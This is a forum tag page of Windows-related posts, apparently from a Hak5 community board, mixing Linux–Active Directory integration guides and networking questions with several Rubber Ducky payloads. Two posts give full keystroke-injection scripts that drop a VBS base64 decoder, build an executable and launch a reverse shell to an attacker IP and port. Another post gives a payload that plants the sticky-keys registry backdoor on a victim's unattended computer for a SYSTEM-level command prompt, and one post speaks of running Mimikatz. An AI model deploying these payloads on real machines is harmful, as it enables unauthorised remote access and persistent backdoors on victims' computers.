Showing results for tags 'WINDOWS'.


  1. Hello all, This is just a small bit of logic to pull the architecture type from the machine and, based on that, perform different functionality calls, i.e. for Mimikatz using both the 32 / 64 bit versions or with procdump specifying -64 for 64 bit machines or not... etc.

         STRING wmic computersystem get SystemType | find "x64" >nul&& (set "SystemType=64bit") || (set "SystemType=32bit")

     Anyhow, you'd put in logic after this which would run your different executable based on the %SystemType% var. I'll write up a full demo script in a bit for those of you wanting an example. Thank you. Enjoy!
  2. Hey, I'm running a Windows PC and I want to know how to set up urlsnarf in Windows. I clicked start urlsnarf and nothing happened.
  3. Configuring Active Directory Accounts For Linux

     You may have followed our previous article detailing step by step how to integrate your RHEL 6 box into a Windows Active Directory environment. Being able to authenticate users and services to Active Directory from Linux is a big plus, but it’s not where this journey ends. We need to set up users' default home directories and default shells before we can really allow users to log in and start using your server. There are two ways to accomplish this. If you have Unix Identity Management Services installed on your domain controller, you will have an easy way to set these configurations inside Active Directory.

     From Windows

     Inside Server Manager select your Active Directory Domain Services, right click to Add Role Services. Make sure these roles are installed. Once you have installed these Role Services we can continue. If you want to administer Active Directory from your workstation, make sure you have the correct AD Administrative tools installed. Make sure you have local admin rights on your workstation. Once you have the correct tools installed, open up Active Directory Users and Computers. Find a “test” user and open their properties. You will now see a new tab called UNIX Attributes.

     Specify Linux configs from Active Directory

     From here you can specify the UID (which will be assigned upon logging into Linux), Login Shell, Home Directory, and Primary Group. We aren’t going to go into detail on NIS domain because this is only important for older configurations of SSSD and ldap, krb5 etc. Let’s run a getent and see what Linux pulls from Active Directory:

         [root@server tmp]# getent passwd test
         test:*:940001114:940000513:test:/home/test@YOURDOMAIN.COM:/bin/bash

     Doesn’t match what’s in Active Directory? Read the Linux part of this article to find out why.

     From Linux

     Remember that thing called SSSD? If not please go back and read this.

     Let’s add a few lines to our sssd.conf:

         override_homedir = /home/%f
         override_shell = /bin/bash

     **Must restart SSSD to take effect**

         service sssd restart

     Only add these lines if you desire this functionality, either way is fine, however if you have a more complex AD environment it sometimes is easier inside SSSD to implicitly imply what configurations you want for your users. In this example we have told SSSD that each AD user that logs in home directory is /home/username (will be created by oddjob) and that we want their default shell to be /bin/bash. Most Linux users will expect this to be their default environment. There you have it. Go forth and shell with your Active Directory accounts.
  4. Red Hat Linux Active Directory Integration

     Can Linux boxes exist in a Windows Active Directory domain? The answer has been yes for a long time. However, until very recently this has been a very painful and tedious process. Exporting certifications, trial and error config files, changing security settings on domain controller, a major headache. Thankfully RedHat has actually realized this was a problem. It’s funny that while Server 2012 is already released RedHat just now added a simple method to integrate authentication with a Windows Active Directory domain. We are a release behind, better now than ever. The real OS of choice.

     NOTE: All Sample Configs are located at the bottom of this page.

     To start, this article ONLY applies to:

         Red Hat Enterprise Linux 6.4
         CENTOS 6.4

     You can find out your version by using

         cat /etc/system-release (CENTOS)
         cat /etc/redhat-release (Red Hat)

     If you are not familiar with SSSD (System Security Services Daemon) then I suggest you do some reading before you dive into this article. Also this is more geared towards Linux admins and not Windows admins. With these new changes you won’t have access your windows admin for anything, well unless you need that domain admin access of course.

     BEFORE WE DO ANYTHING ALWAYS BACKUP YOUR CONFIGS

         authconfig --savebackup=mybackup

     First to get started let’s check what version of SSSD you have installed on your box. NOTE: If a domain name is in CAPS it is on purpose. This was not done for show.

         rpm -q sssd

     You will need at least SSSD 1.9.2 for this. Let’s go ahead and set up all of the necessary nss and pam config files.

         authconfig --enablesssd --ldapserver=ldap://dc1.youdomain.com --ldapbasedn="dc=YOURDOMAIN,dc=COM" --enablerfc2307bis --enablesssdauth --krb5kdc=dc1.youdomain.com --krb5realm=YOURDOMAIN.COM --disableforcelegacy --enablelocauthorize --enablemkhomedir --updateall

         vi /etc/krb5.conf

         [logging]
          default = FILE:/var/log/krb5libs.log
          kdc = FILE:/var/log/krb5kdc.log
          admin_server = FILE:/var/log/kadmind.log

         [libdefaults]
          default_realm = YOURDOMAIN.COM
          dns_lookup_realm = false
          dns_lookup_kdc = false
          ticket_lifetime = 24h
          renew_lifetime = 7d
          forwardable = true
          #These encryption types are required for ntvlmi and krb5i(packet signing)
          default_tgs_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
          default_tkt_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96
          permitted_enctypes = rc4-hmac aes256-cts-hmac-sha1-96 aes128-cts-hmac-sha1-96

         [realms]
          YOURDOMAIN.COM = {
           kdc = domaincontroller.yourdomain.com:88
           admin_server = domaincontroller.yourdomain.com:749
           default_domain = yourdomain.com
          }

         [domain_realm]
          .yourdomain.com = YOURDOMAIN.COM
          yourdomain.com = YOURDOMAIN.COM

     Next

         vi /etc/samba/smb.conf

         [global]
          workgroup = YOURDOMAIN
          client signing = yes
          client use spnego = yes
          kerberos method = secrets and keytab
          log file = /var/log/samba/%m.log
          realm = YOURDOMAIN.COM
          security = ads

         vi /etc/sssd/sssd.conf

         [sssd]
         config_file_version = 2
         services = nss, pam
         domains = YOURDOMAIN.COM

         [nss]
         nss_filter_groups = root
         nss_filter_users = root
         nss_entry_cache_timeout = 30
         nss_enum_cache_timeout = 30

         [domain/YOURDOMAIN.COM]
         id_provider = ad
         ad_server=domaincontroller.yourdomain.com
         ad_domain=yourdomain.com

     Now you will need an Active Directory account with administrator privileges to add machines to the domain. Before you run kinit make sure you update your time with a domain controller.

         ntpdate dc1.youdomain.com

     Once time is synced continue with..

         kinit administrator

     Type your password. Confirm that you have received a kerberos ticket by using

         klist

     If you do not see any tickets please refer to your logs. SSSD is somewhat helpful inside /var/log/messages. Now we have a ticket we need to add this machine to the domain.

         net ads join -k

     If you receive a success message your new Linux box should be inside Active Directory inside the default Computers Group. Verify with an Active Directory Admin to make sure your server object was created. Let’s run:

         service sssd restart

     If you did not receive any warning messages inside /var/log/messages we should be good to go. Test by running

         id yourusernamead

     and

         getent passwd yourusernamead

     You should be able to look up accounts at this point.

     Now the best part of this. Let’s set up Putty and SSHD to use your kerberos key to authenticate into your Linux box. As you noted inside our sssd.conf we have added root accounts not to use AD authentication. First let’s make some changes to our SSHD configs.

         vi /etc/ssh/sshd_config

     Make sure you have this line uncommented:

         GSSAPIAuthentication yes

         vi /etc/ssh/ssh_config

         GSSAPIAuthentication yes
         GSSAPIDelegateCredentials yes

     Also before trying to use Putty make sure you have a newer release and make sure your authentication settings are set up as follows: Make sure this is enabled. Now open a new session to your Linux box. Type in your Active Directory username and press enter. If kerberos negotiation is successful you will NOT be prompted for a password.

     Happy Shelling

     Sample Config Files: krb5.conf sssd.conf ssh_conf sshd_conf

     If you are a RedHat subscriber you can read their article on this subject here.
  5. Hey gang! Ok so I'm trying to automate a script for my mother so I can get her work laptop MAC filtered into her home network. She so conveniently keeps forgetting it at work. Bring in the Duck!! Here's my goal: I want to create a payload to where it opens up cmd, does "ipconfig /all", saves what the terminal session spits out to a .txt in the c:\ drive, then copy that newly created .txt to the duck. Here's what I got, that doesn't work:

         delay 800
         gui x (I'm testing this on my windows 8 machine, she still runs XP SP3)
         up
         up
         enter
         string CMD
         string ipconfig /all >c:\ipdata.txt ; copy /A ipdata.txt f:\ /A /V
         delay 300

     When I test this on my win8 box, it does open cmd, but after it does a bunch of other crazy things. However if I take the code down to just:

         delay 800
         gui x
         up
         up
         enter
         string cmd

     I get the cmd window normally. Any ideas?
  6. Up until recently I've been hosting a website from home, which I've mainly been using as a sandbox site and repository. I have been using Windows 7 Ultimate, XAMPP 1.81, DirectUpdate and a dynamic DNS address. I've whitelisted XAMPP through Windows Firewall and allowed traffic through the router's NAT to my PC which is on a static IP at home. I also use BitVise WinSSHd as an SSH server, using virtual profiles rather than Windows Authentication. It's all worked really well up to now, but after speaking to a few people, they've said that you should never use XAMPP or the like for publicly accessible websites. To that end, I've been wondering what is the most secure and most recommended way to run a website from home? So, starting with a fresh and fully updated version of Windows 7 Ultimate, where do I go from here? Also one side-question; can you run Apache and IIS concurrently on the same machine and have both serve websites on virtual hosts?
  7. If I team 2 or more NICs, does each NIC still keep its physical IP address even though a virtual one has been created? I am asking this because I currently have a Windows Server 2012 server with a dual Gigabit PCI-X card with an IP set on each Ethernet port, and each one is linked to an FTP server. I am wondering, if I do the NIC teaming, will this conflict with the dedicated FTP servers?
  8. I'm trying to run the Windows Reverse Shell Payload on a 64 bit system, and I get the error: "C:\reverse.exe is not a valid Win32 application." Is there something wrong with the payload itself? Or does it not run on 64-bit systems? Script below. Any help would be greatly appreciated!

         DELAY 1000
         ESCAPE
         ESCAPE
         DELAY 400
         WINDOWS R
         DELAY 400
         STRING cmd
         DELAY 400
         ENTER
         DELAY 400
         STRING copy con c:\decoder.vbs
         ENTER
         STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
         STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
         STRING CreateObject("Scripting.FileSystemObject"):
         ENTER
         STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
         STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
         STRING decodeBase64(base64):
         ENTER
         STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
         STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
         STRING writeBytes(file, bytes):Dim binaryStream:
         ENTER
         STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
         STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
         ENTER
         CTRL z
         ENTER
         STRING copy con c:\reverse.txt
         ENTER
         CTRL z
         ENTER
         STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
         ENTER
         STRING c:\reverse.exe 192.168.1.47 8080
         ENTER
         STRING pause
         ENTER
  9. I can't connect or set up my new Wi-Fi Pineapple. I followed the steps in the guide and online exactly to the best of my knowledge. I don't see why this isn't working. It should be pretty simple, but for whatever reason, it just doesn't want to work. I can provide more details if needed. Please help, thanks!

     Pineapple Hardware Version (ex: Mark III, Mark IV, etc.): Mark IV

     Pineapple Software Version (ex: 2.5.0, 2.6.4): Whatever the default firmware it shipped with is (I didn't change it as I can't do anything)

     OS used to connect to the pineapple: Windows 7

     Network layout of how your setup is connected (including IP information): I connect to the internet with a Wi-Fi connection (Wireless Network Connection). I connected the pineapple to my Ethernet port on my laptop to the pineapple's WAN/LAN port (Local Area Connection). Here is the result from ipconfig:

         Wireless LAN adapter Wireless Network Connection:

            Connection-specific DNS Suffix . : gateway.pace.com
            Link-local IPv6 Address . . . . . : fe80::e1e5:c468:b293:8a1a%15
            IPv4 Address. . . . . . . . . . . : 192.168.1.67
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . : 192.168.1.254

         Ethernet adapter Local Area Connection:

            Connection-specific DNS Suffix . :
            Link-local IPv6 Address . . . . . : fe80::9de3:238d:91f7:1c1c%13
            IPv4 Address. . . . . . . . . . . : 172.16.42.42
            Subnet Mask . . . . . . . . . . . : 255.255.255.0
            Default Gateway . . . . . . . . . :

     All the tools/options that are running on the pineapple when the issue happened: Default

     Ping results from computer to pineapple:

         C:\Users\Dr Dinosaur>ping 172.16.42.42

         Pinging 172.16.42.42 with 32 bytes of data:
         Reply from 172.16.42.42: bytes=32 time<1ms TTL=128
         Reply from 172.16.42.42: bytes=32 time<1ms TTL=128
         Reply from 172.16.42.42: bytes=32 time<1ms TTL=128
         Reply from 172.16.42.42: bytes=32 time<1ms TTL=128

         Ping statistics for 172.16.42.42:
             Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
         Approximate round trip times in milli-seconds:
             Minimum = 0ms, Maximum = 0ms, Average = 0ms

         C:\Users\Dr Dinosaur>ping 172.16.42.1

         Pinging 172.16.42.1 with 32 bytes of data:
         Reply from 172.16.42.42: Destination host unreachable.
         Request timed out.
         Request timed out.
         Request timed out.

         Ping statistics for 172.16.42.1:
             Packets: Sent = 4, Received = 1, Lost = 3 (75% loss),

     Is the problem repeatable (Yes/No): Yes

     Steps taken which created the problem: The initial set up for Windows (on the included book and from http://cloud.wifipin...guidequickstart)

     Error Messages: Google Chrome could not connect to ...

     Log file information: Not sure where to get this from (if possible with no valid connection).

     Anything else that was attempted to 'fix' the problem: Re-tried setup. I also tried to connect to my BT5RC3 VM with no luck.
  10. Guys, I take no credit for this payload.... I just took an already working payload and made some minor tweaks (the way the command prompt is opened) to make it more reliable for my personal use. The original code can be found here: https://securepla.net/download/ducky.txt

          DELAY 600
          ESCAPE
          ESCAPE
          DELAY 400
          WINDOWS R
          DELAY 400
          STRING cmd
          DELAY 400
          ENTER
          DELAY 400
          STRING copy con c:\decoder.vbs
          ENTER
          STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
          STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
          STRING CreateObject("Scripting.FileSystemObject"):
          ENTER
          STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
          STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
          STRING decodeBase64(base64):
          ENTER
          STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
          STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
          STRING writeBytes(file, bytes):Dim binaryStream:
          ENTER
          STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
          STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
          ENTER
          CTRL z
          ENTER
          STRING copy con c:\reverse.txt
          ENTER
          CTRL z
          ENTER
          STRING cscript c:\decoder.vbs c:\reverse.txt c:\reverse.exe
          ENTER
          STRING c:\reverse.exe 172.16.1.7 4444
          ENTER
          STRING exit
          ENTER
  11. Hi. So I know there are many posts on setup, but something that is unique about mine is that, in the book, it shows that the Pineapple is using an Intel® PRO/1000 MT Desktop Adapter #2. Well, mine is not showing that. Also, after I follow the steps in this book and try to go to 174.16.42.1, my browser can't connect to it. I have looked at some posts and videos, but I still can't figure things out. Also it is showing it's connected using Microsoft Virtual WiFi Miniport Adapter.
  12. I have been trying to figure out a way to get several of my Win 7 laptops to be able to automatically create / initialize an ad-hoc network when they boot up, or connect to the already initialized ad-hoc network if it is present. I want all of the computers to automatically connect to each other. Think 5 robots coming online and about to interact with each other, with no AP, or Router nearby. I have been working with netsh commands and setupSNK.exe, but no joy. It seems Windows blocked all the automatic connections for ad-hoc networks due to some security concerns. Does any one know of a way to get Windows to allow an automatic connection of this type?
  13. Hey all, first post so I'm not sure as to where to put it, but I read about this coming out recently and wanted to share with the Hak5 community. http://www.extremetech.com/computing/138363-the-cia-de-blurs-license-plates-from-outer-space-now-you-can-too-for-free If it's TL;DR for you then basically what it is, is a program that allows you to remove blur from photos or things like Google Maps and the like. As far as I know it's legal, I haven't found anything stating otherwise.
  14. Hi Guys! I want to know what IP number range is used on my network... just want to confirm whether I'm using the right command?

          nmap 192.168.210.0/24

      And if you could also explain how it works... btw thanks in advance. Regards, Ewa
  15. I know that if you have physical access to a computer, it's pretty much owned. But the reason I wanted to make a rubber ducky payload of this old backdoor is that you only need a few seconds to install the backdoor. I.e. when the victim leaves his/her computer unattended without putting on a screen saver with password, you put in the rubber ducky and install this payload. After this you can a) press the SHIFT key continuously for 5 times or b) Alt+Shift+PrintScreen which will open a command prompt with system privilege. Simple and cool :-) Make sure to take a backup of the original sethc.exe. I have had some encoding issues, be sure to check out which keyboards the rubber ducky firmware supports. I have edited the code without testing it again, but I think it still will compile and run as planned. Tune the delay parameter for your own PC. I have made the delays long enough for you to see what's happening. Enjoy. The victim's machine must have admin privileges for this to work.

          REM Author: Asbjørn Reglund Thorsen <art@awaresec.no>
          REM Target: Tested on Windows 7
          REM Description: Replaces the "Sticky keys" on windows 7s login screen with the "command prompt" executable
          REM References: http://carnal0wnage....ticky-keys.html
          REM http://www.redmondpi...n-login-screen/
          ESCAPE
          CONTROL ESCAPE
          DELAY 400
          STRING cmd
          DELAY 400
          MENU
          DELAY 400
          DOWN
          DELAY 400
          DOWN
          DELAY 1000
          ENTER
          DELAY 1000
          LEFT
          DELAY 1000
          ENTER
          DELAY 1000
          STRING REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
          STRING /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
          DELAY 400
          ENTER
          REM Notes:
          REM Thanks to Espen Grøndal who told me about this "feature"
          REM The trick does not work when the Sticky Keys are disabled.
          REM If you see the message that says “The operation completed successfully”, that means you have installed the backdoor.
          REM Cleanup: You can use reg edit and browse to "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\" and remove the sethc.exe file.